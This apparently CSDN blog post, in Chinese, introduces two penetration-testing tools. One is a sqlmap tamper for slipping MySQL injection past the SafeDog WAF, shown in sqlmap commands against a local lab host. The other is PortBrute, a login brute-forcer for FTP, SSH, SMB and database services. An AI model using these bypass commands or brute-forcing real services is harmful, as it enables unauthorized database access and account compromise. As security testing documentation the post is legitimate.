-
MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog,以及端口爆破工具 -- PortBrute配置使用
工具介绍
此Tamper仅仅适用于MySQL数据库,在SQLMap使用过程中添加参数–tamper=MySQLByPassForSafeDog。
安装与使用
1、安装网站安全狗Apache最新版
2、启用安全狗,不加MySQLByPassForSafeDog绕狗Tamper:
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql- 1
3、启用安全狗,添加MySQLByPassForSafeDog绕狗Tamper:
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog- 1
4、绕过POC
可以添加参数-v 3进行学习查看
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3- 1
下载地址
项目地址:https://github.com/Tas9er/MySQLByPassForSafeDog
端口爆破工具 – PortBrute配置使用
一、简介
一款跨平台小巧的端口爆破工具,支持爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD。
二、使用方法
1、ip.txt中放入需要爆破的ip+端口,比如 10.10.10.10:3306。如果不是标准端口,比如3307是MYSQL。写成 10.10.10.10:3307|MYSQL。其他FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD同理
2、Windows/MAC/Linux已经打包好了,分别对应(PortBruteWin.exe/PortBruteMac/PortBruteLinux)。无论是内网渗透,还是日常使用,直接下载下来就可以直接用。
三、下载地址
1、通过该项目地址下载:https://github.com/awake1t/PortBrute
-
相关阅读:
【攻破css系列——第九天】常规流
量化交易全流程(七)
华为云云耀云服务器L实例评测|centos7.9 配置python虚拟环境 运行django
产品思维训练 | 为什么很多家喻户晓的品牌还要继续投广告?
LeetCode 82 删除排序链表中的重复元素 II
500~1000元价位有哪些新手入门吉他推荐?saga萨伽、VEAZEN费森和雅马哈这几个品牌怎么样?
基于springboot实现休闲娱乐代理售票平台系统项目【项目源码+论文说明】
不以功利谈“感统”:拒绝焦虑,顺应养育,才能让孩子走得更远
从理论到实践:MySQL性能优化和高可用架构,一次讲清
【Excel】单元格如何设置可选项、固定表头
- 原文地址:https://blog.csdn.net/u014374009/article/details/132916712